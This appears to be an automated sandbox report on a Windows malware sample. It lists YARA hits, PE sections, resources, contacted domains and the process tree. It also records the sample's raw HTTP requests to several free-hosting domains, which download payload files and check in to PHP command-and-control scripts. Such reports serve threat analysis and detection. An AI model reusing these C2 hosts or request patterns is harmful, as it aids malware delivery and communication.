| Yara Pattern Name | Description |
|---|---|
| IsPE32 | No Description Available |
| HasOverlay | Overlay Check |
| HasModified_DOS_Message | DOS Message Check |
| MinGW_1 | No Description Available |
| Big_Numbers3 | Looks for big numbers 64:sized |
| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
|---|---|---|---|---|
| .text | 0x00001000 | 0x00001484 | 0x00001600 | 5.73625436377 |
| .data | 0x00003000 | 0x0005a010 | 0x0005a200 | 6.74483198277 |
| .rdata | 0x0005e000 | 0x000001a0 | 0x00000200 | 4.1645328295 |
| .eh_fram | 0x0005f000 | 0x000003a0 | 0x00000400 | 4.26827262382 |
| .bss | 0x00060000 | 0x00000064 | 0x00000000 | 0.0 |
| .idata | 0x00061000 | 0x00000474 | 0x00000600 | 4.05030532401 |
| .CRT | 0x00062000 | 0x00000018 | 0x00000200 | 0.118369631259 |
| .tls | 0x00063000 | 0x00000020 | 0x00000200 | 0.20448815744 |
| .rsrc | 0x00064000 | 0x00003f30 | 0x00004000 | 4.35707637467 |
| Name | Offset | Size | Language | Sub-language | File type |
|---|---|---|---|---|---|
| RT_ICON | 0x000677ac | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | GLS_BINARY_LSB_FIRST |
| RT_ICON | 0x000677ac | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | GLS_BINARY_LSB_FIRST |
| RT_ICON | 0x000677ac | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | GLS_BINARY_LSB_FIRST |
| RT_GROUP_ICON | 0x00067c14 | 0x00000030 | LANG_ENGLISH | SUBLANG_ENGLISH_US | MS Windows icon resource - 3 icons, 48x48 |
| RT_VERSION | 0x00067c44 | 0x000002ec | LANG_ENGLISH | SUBLANG_ENGLISH_US | data |
| Domain | IP Address | Destination Location |
|---|---|---|
| quick.comuf.com | 153.92.0.100 | DE |
| supportbackup.esy.es | Not Available | |
| backupsupport.esy.es | Not Available | |
| supportservice.netai.net | 153.92.0.100 | DE |
| quicks.hol.es | Not Available | |
| backupsupport.comxa.com | 153.92.0.100 | DE |
| watson.microsoft.com | 52.184.220.162 | US |
GET /z/dwn13.dmp HTTP/1.1 Host: backupsupport.comxa.com Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en,en-us;q=0.7,en;q=0.3 Accept-Encoding: deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
GET /c13/dwn13.dmp HTTP/1.1 Host: quick.comuf.com Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en,en-us;q=0.7,en;q=0.3 Accept-Encoding: deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
GET /c/c13.php?m=a&h=c88b786c HTTP/1.1 Host: supportservice.netai.net Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en,en-us;q=0.7,en;q=0.3 Accept-Encoding: deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
GET /z/c13.php?m=a&h=c88b786c HTTP/1.1 Host: backupsupport.comxa.com Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en,en-us;q=0.7,en;q=0.3 Accept-Encoding: deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
| IP Address | Country of Origin |
|---|---|
| 153.92.0.100 | DE |
| Process Name | PID | Parent PID |
| 8ae318518503e8945ec4cc371e7546e1e6d9acc4dd3f575d69bf754dd7edd4a6.exe | 2452 | 2400 |
| SearchHelper.exe | 2508 | 2452 |
| com3.exe | 2556 | 2452 |
| 8ae318518503e8945ec4cc371e7546e1e6d9acc4dd3f575d69bf754dd7edd4a6.exe | 2608 | 2452 |
| SearchHelper.exe | 1008 | 2608 |
| com3.exe | 2216 | 2608 |
| reg.exe | 2888 | 2556 |